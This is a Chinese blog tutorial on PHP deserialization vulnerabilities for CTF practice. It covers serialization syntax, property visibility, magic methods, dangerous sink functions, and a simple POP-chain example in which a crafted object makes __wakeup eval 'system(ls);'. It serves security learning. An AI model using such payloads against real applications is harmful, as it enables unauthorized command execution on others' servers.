

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="big_freeze_mouse">
  <meta name="keywords" content="">
  
    <meta name="description" content="参考文章链接 链接 什么是PHP反序列化漏洞？在PHP中，unserialize() 函数用于将之前通过 serialize() 函数序列化的字符串还原成PHP的原始数据结构，如数组或对象。如果 unserialize() 处理的数据来自不可信的来源（例如用户输入），且没有适当的验证和清理，攻击者就能够控制此数据以尝试创建任何类型的对象，并调用其方法。 漏洞产生原因控制对象创建：攻击者可以控制">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化">
<meta property="og:url" content="http://example.com/2024/12/19/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="big_freeze_mouse的个人博客">
<meta property="og:description" content="参考文章链接 链接 什么是PHP反序列化漏洞？在PHP中，unserialize() 函数用于将之前通过 serialize() 函数序列化的字符串还原成PHP的原始数据结构，如数组或对象。如果 unserialize() 处理的数据来自不可信的来源（例如用户输入），且没有适当的验证和清理，攻击者就能够控制此数据以尝试创建任何类型的对象，并调用其方法。 漏洞产生原因控制对象创建：攻击者可以控制">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-12-19T14:08:55.000Z">
<meta property="article:modified_time" content="2024-12-19T14:09:37.447Z">
<meta property="article:author" content="big_freeze_mouse">
<meta property="article:tag" content="BaseCTF(WEB方向)">
<meta name="twitter:card" content="summary_large_image">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>PHP反序列化 - big_freeze_mouse的个人博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Big_freeze_mouse</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/me.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PHP反序列化"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-12-19 22:08" pubdate>
          2024年12月19日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          28 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">PHP反序列化</h1>
            
            
              <div class="markdown-body">
                
                <meta name="referrer" content="no-referrer">

<p>参考文章<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42628854/article/details/141569755?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522a7fbc8197d45505ee5fbe79c91a5b379%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=a7fbc8197d45505ee5fbe79c91a5b379&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-14-141569755-null-null.142%5Ev100%5Epc_search_result_base7&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187">链接</a> <a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42628854/article/details/141569755?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522a7fbc8197d45505ee5fbe79c91a5b379%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=a7fbc8197d45505ee5fbe79c91a5b379&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-14-141569755-null-null.142%5Ev100%5Epc_search_result_base7&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187">链接</a></p>
<h2 id="什么是PHP反序列化漏洞？"><a href="#什么是PHP反序列化漏洞？" class="headerlink" title="什么是PHP反序列化漏洞？"></a><font style="color:#000000;">什么是PHP反序列化漏洞？</font></h2><p>在PHP中，unserialize() 函数用于将之前通过 serialize() 函数序列化的字符串还原成PHP的原始数据结构，如数组或对象。如果 unserialize() 处理的数据来自不可信的来源（例如用户输入），且没有适当的验证和清理，攻击者就能够控制此数据以尝试创建任何类型的对象，并调用其方法。</p>
<h2 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a><font style="color:#000000;">漏洞产生原因</font></h2><p>控制对象创建：攻击者可以控制序列化字符，强制应用程序创建特定的对象实例。</p>
<p>魔术方法触发：一些魔术方法如 __wakeup(), __destruct(), __toString(), 和 __call() 在对象的生命周期的特定时刻自动执行。如果攻击者可以控制这些对象的创建，他们可以触发这些方法以执行恶意代码。</p>
<p>利用现有的应用逻辑：在某些情况下，即使没有直接执行代码的能力，攻击者也可以通过改变应用状态或行为来利用应用逻辑。</p>
<h2 id="php序列化的字母标识："><a href="#php序列化的字母标识：" class="headerlink" title="php序列化的字母标识："></a><font style="color:#000000;">php序列化的字母标识：</font></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs plain">a - 数组 (Array): 一种数据结构，可以存储多个相同类型的元素。<br>b - 布尔型 (Boolean): 一种数据类型，只有两个可能的值：true 或 false。<br>d - 双精度浮点数 (Double): 一种数据类型，用于存储双精度浮点数值。<br>i - 整型 (Integer): 一种数据类型，用于存储整数值。<br>o - 普通对象 (Common Object): 一个通用的对象类型，它可以是任何类的实例。<br>r - 引用 (Reference): 指向对象的引用，而不是对象本身。<br>s - 字符串 (String): 一种数据类型，用于存储文本数据。<br>C - 自定义对象 (Custom Object): 指由开发者定义的特定类的实例。<br>O - 类 (Class): 在面向对象编程中，类是一种蓝图或模板，用于创建对象。<br>N - 空 (Null): 在许多编程语言中，null 表示一个不指向任何对象的特殊值。<br>R - 指针引用 (Pointer Reference): 一个指针变量，其值为另一个变量的地址。<br>U - 统一码字符串 (Unicode String): 一种数据类型，用于存储包含各种字符编码的文本数据。<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plain">各类型值的serialize序列化：<br> <br>空字符       null  -&gt;     N;<br>整型         123   -&gt;     i:123;<br>浮点型       1.5   -&gt;     d:1.5;<br>boolean型    true   -&gt;    b:1;<br>boolean型    fal    -&gt;    b:0;<br>字符串       “haha”  -&gt;   s:4:&quot;haha&quot;;<br></code></pre></td></tr></table></figure>

<h2 id="类中的属性-public、protected、private"><a href="#类中的属性-public、protected、private" class="headerlink" title="类中的属性(public、protected、private)"></a><font style="color:#000000;">类中的属性(public、protected、private)</font></h2><p>PHP 对属性或方法的<strong>访问控制</strong>，是通过在前面添加<strong>关键字</strong> public（公有），protected（受保护）或 private（私有）来实现的。</p>
<p><strong>public（公有）：</strong>公有的类成员可以在<strong>任何地方被访问</strong>。</p>
<p><strong>protected（受保护</strong>）：受保护的类成员则可以<strong>被其自身以及其子类和父类访问</strong>。</p>
<p><strong>private（私有）：</strong>私有的类成员则<strong>只能被其定义所在的类访问</strong>。</p>
<p>注意：<strong>访问控制修饰符不同</strong>，序列化后属性的长度和属性值会有所不同，如下所示：</p>
<p><strong>public：</strong>属性被序列化的时候属性值会变成 <font style="color:#601BDE;">属性名</font></p>
<p><strong>protected：</strong>属性被序列化的时候属性值会变成<font style="color:#601BDE;"> \x00*\x00属性名</font></p>
<p><strong>private：</strong>属性被序列化的时候属性值会变成 <font style="color:#601BDE;">\x00类名\x00属性名</font></p>
<p><font style="color:rgb(77, 77, 77);">其中：</font><font style="color:#601BDE;">\x00</font><font style="color:rgb(77, 77, 77);"> 表示</font><strong><font style="color:rgb(77, 77, 77);">空字符</font></strong><font style="color:rgb(77, 77, 77);">，但是还是占用一个字符位置（空格），如下例</font></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">&lt;?php<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">People</span>&#123;<br>    public $<span class="hljs-built_in">id</span>;<br>    protected $gender;<br>    private $age;<br>    public function __construct()&#123;<br>        $this-&gt;<span class="hljs-built_in">id</span> = <span class="hljs-string">&#x27;Hardworking666&#x27;</span>;<br>        $this-&gt;gender = <span class="hljs-string">&#x27;male&#x27;</span>;<br>        $this-&gt;age = <span class="hljs-string">&#x27;18&#x27;</span>;<br>    &#125;<br>&#125;<br>$a = new People();<br>echo serialize($a);<br>?&gt;<br><br></code></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">O:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;People&quot;</span>:<span class="hljs-number">3</span>:&#123;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;id&quot;</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;Hardworking666&quot;</span>;s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot; * gender&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;male&quot;</span>;s:<span class="hljs-number">11</span>:<span class="hljs-string">&quot; People age&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;18&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="常见的php反序列化ctf题目的做题步骤"><a href="#常见的php反序列化ctf题目的做题步骤" class="headerlink" title="常见的php反序列化ctf题目的做题步骤"></a>常见的php反序列化ctf题目的做题步骤</h2><p>1、复制源代码到本地</p>
<p>2、注释掉和属性无关的内容（只剩类名和属性）</p>
<p>3、根据题目需要给属性赋值（最关键的一步）</p>
<p>4、生成序列化数据（pop链），通常要urlencode</p>
<p>5、传递数据到服务器（攻击目标）</p>
<h2 id="POP链构造"><a href="#POP链构造" class="headerlink" title="POP链构造"></a><font style="color:#000000;">POP链构造</font></h2><p>在计算机安全领域，特别是在讨论反序列化漏洞时，”POP链”通常指的是”属性方向的编程”（Property-Oriented Programming）链。这种技术利用了应用程序中的已有代码，尤其是那些可以通过对象的一系列属性调用或方法调用来触发的代码。攻击者通过精心构造的恶意输入（即序列化的对象），使得在反序列化过程中会触发预定义的方法链，执行潜在的恶意活动。</p>
<p>一个 “POP链” 通常涉及以下几个步骤：</p>
<h3 id="1-选择目标函数"><a href="#1-选择目标函数" class="headerlink" title="1.选择目标函数"></a><font style="color:#000000;">1.选择目标函数</font></h3><p><font style="color:rgb(77, 77, 77);">首先，需要识别应用程序中哪些现有的函数可以被用于执行恶意行为，常见的可利用函数如下所示：</font></p>
<h4 id="1-命令执行函数"><a href="#1-命令执行函数" class="headerlink" title="(1)命令执行函数"></a><font style="color:#000000;">(1)命令执行函数</font></h4><p><font style="color:rgb(77, 77, 77);">exec(),shell_exec(), system(), passthru(), proc_open和popen()</font></p>
<p><font style="color:rgb(77, 77, 77);">exec() 函数执行一个外部程序，并且只返回最后一行的输出结果。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">exec(&#x27;ls -l&#x27;, $output, $return_var);<br>print_r($output); // 打印所有输出行的数组<br>echo $return_var; // 执行状态代码<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">shell_exec() 执行通过 shell 的命令，并且将完整的输出作为字符串返回。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$output = shell_exec(&#x27;ls -l&#x27;);<br>echo &quot;&lt;pre&gt;$output&lt;/pre&gt;&quot;; // 显示命令输出<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">system() 函数用于执行外部程序，并显示输出。它是实时显示输出，适合用于需要即时反馈的场合。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">system(&#x27;ls -l&#x27;);<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">passthru() 函数执行一个外部程序，并直接将原始输出传递给浏览器。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">passthru(&#x27;cat image.png&#x27;); // 输出图片文件的内容<br></code></pre></td></tr></table></figure>

<h4 id="2-代码执行函数"><a href="#2-代码执行函数" class="headerlink" title="(2)代码执行函数"></a><font style="color:#000000;">(2)代码执行函数</font></h4><p><font style="color:rgb(77, 77, 77);">eval() ,create_function() ,assert()</font></p>
<p><font style="color:rgb(77, 77, 77);">eval() 函数将字符串作为 PHP 代码执行。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$code = &#x27;echo &quot;Hello, world!&quot;;&#x27;;<br>eval($code);<br></code></pre></td></tr></table></figure>

<h4 id="3-文件读取类函数"><a href="#3-文件读取类函数" class="headerlink" title="(3)文件读取类函数"></a><font style="color:#000000;">(3)文件读取类函数</font></h4><p><font style="color:#000000;">file_get_contents(), fread(),readfile()</font></p>
<p><font style="color:#000000;">file_get_contents()读取整个文件到一个字符串。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$content = file_get_contents(&quot;example.txt&quot;);<br>echo $content;<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">fread()从文件指针中读取数据，必须使用fopen()打开文件。</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">$file = fopen(&quot;example.txt&quot;, &quot;r&quot;);<br>$content = fread($file, filesize(&quot;example.txt&quot;));<br>fclose($file);<br>echo $content;<br></code></pre></td></tr></table></figure>

<h4 id="4-文件写入类函数"><a href="#4-文件写入类函数" class="headerlink" title="(4)文件写入类函数"></a><font style="color:#000000;">(4)文件写入类函数</font></h4><p><font style="color:rgb(77, 77, 77);">file_put_contents(), fwrite()</font></p>
<p><font style="color:rgb(77, 77, 77);">file_put_contents()将字符串写入文件中</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">file_put_contents(&quot;example.txt&quot;, &quot;Hello World!&quot;);<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">fwrite()像文件中写入数据，需要先用fopen()打开文件并获取文件指针</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">$file = fopen(&quot;example.txt&quot;, &quot;w&quot;);<br>fwrite($file, &quot;Hello World!&quot;);<br>fclose($file);<br></code></pre></td></tr></table></figure>

<h4 id="5-文件包含函数"><a href="#5-文件包含函数" class="headerlink" title="(5)文件包含函数"></a><font style="color:#000000;">(5)文件包含函数</font></h4><p><font style="color:rgb(77, 77, 77);">include、require、include_once、require_once</font></p>
<h3 id="2-构造对象图"><a href="#2-构造对象图" class="headerlink" title="2.构造对象图"></a><font style="color:#000000;">2.构造对象图</font></h3><p><font style="color:rgb(77, 77, 77);">然后，创建一个对象图，这些对象通过它们的方法和属性相互关联，以确保当触发反序列化时可以按照特定顺序调用目标方法。</font></p>
<h3 id="3-控制流程"><a href="#3-控制流程" class="headerlink" title="3.控制流程"></a><font style="color:#000000;">3.控制流程</font></h3><p><font style="color:rgb(77, 77, 77);">通过操纵对象状态和方法调用顺序，达到控制应用程序行为的目的。</font></p>
<p><font style="color:rgb(77, 77, 77);">简单举例：</font></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TestClass</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$test</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;test);<br>    &#125;<br>&#125;<br> <br><span class="hljs-comment">// 恶意用户控制的数据</span><br><span class="hljs-variable">$data</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$data</span>);<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(77, 77, 77);">data序列化数据构造：</font></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TestClass</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$test</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;test);<br>    &#125;<br>&#125;<br> <br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">TestClass</span>();<br><span class="hljs-variable">$a</span>-&gt;test = <span class="hljs-string">&#x27;system(ls);&#x27;</span>;<br> <br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-comment">//此简单例子中无需任何绕过，仅将实例a的test值赋值为system(ls);，在根据魔术方法 __wakeup()在使用 unserialize()方法时自动调用，达到命令执行的目的。</span><br></code></pre></td></tr></table></figure>



<h2 id="常见魔术方法的触发"><a href="#常见魔术方法的触发" class="headerlink" title="常见魔术方法的触发"></a><font style="color:#000000;">常见魔术方法的触发</font></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//魔术方法</span><br> <br><span class="hljs-title function_ invoke__">__construct</span>()       <span class="hljs-comment">//类的构造函数，创建对象时触发</span><br> <br><span class="hljs-title function_ invoke__">__destruct</span>()        <span class="hljs-comment">//类的析构函数，对象被销毁时触发</span><br> <br><span class="hljs-title function_ invoke__">__call</span>()            <span class="hljs-comment">//调用对象不可访问、不存在的方法时触发</span><br> <br><span class="hljs-title function_ invoke__">__callStatic</span>()     <span class="hljs-comment">//在静态上下文中调用不可访问的方法时触发</span><br> <br><span class="hljs-title function_ invoke__">__get</span>()            <span class="hljs-comment">//调用不可访问、不存在的对象成员属性时触发</span><br> <br><span class="hljs-title function_ invoke__">__set</span>()           <span class="hljs-comment">//在给不可访问、不存在的对象成员属性赋值时触发</span><br> <br><span class="hljs-title function_ invoke__">__isset</span>()         <span class="hljs-comment">//当对不可访问属性调用isset()或empty()时触发</span><br> <br><span class="hljs-title function_ invoke__">__unset</span>()         <span class="hljs-comment">//在不可访问的属性上使用unset()时触发</span><br> <br><span class="hljs-title function_ invoke__">__invoke</span>()        <span class="hljs-comment">//把对象当初函数调用时触发</span><br> <br><span class="hljs-title function_ invoke__">__sleep</span>()        <span class="hljs-comment">//执行serialize()时，先会调用这个方法</span><br> <br><span class="hljs-title function_ invoke__">__wakeup</span>()       <span class="hljs-comment">//执行unserialize()时，先会调用这个方法</span><br> <br><span class="hljs-title function_ invoke__">__toString</span>()     <span class="hljs-comment">//把对象当成字符串调用时触发</span><br> <br><span class="hljs-title function_ invoke__">__clone</span>()        <span class="hljs-comment">//使用clone关键字拷贝完一个对象后触发</span><br></code></pre></td></tr></table></figure>

<h3 id="construct-和-destruct"><a href="#construct-和-destruct" class="headerlink" title="__construct()和__destruct()"></a>__construct()和__destruct()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//__construct()和__destruct()</span><br> <br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&quot;haha&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;已创建--&quot;</span>;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;已销毁&quot;</span>;<br>    &#125;<br>&#125;<br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br> <br><span class="hljs-meta">?&gt;</span><br> <br><span class="hljs-comment">//输出：</span><br>已创建--已销毁<br> <br><span class="hljs-comment">//对象被创建时触发__construct()方法，对象使用完被销毁时触发__destruct()方法</span><br></code></pre></td></tr></table></figure>

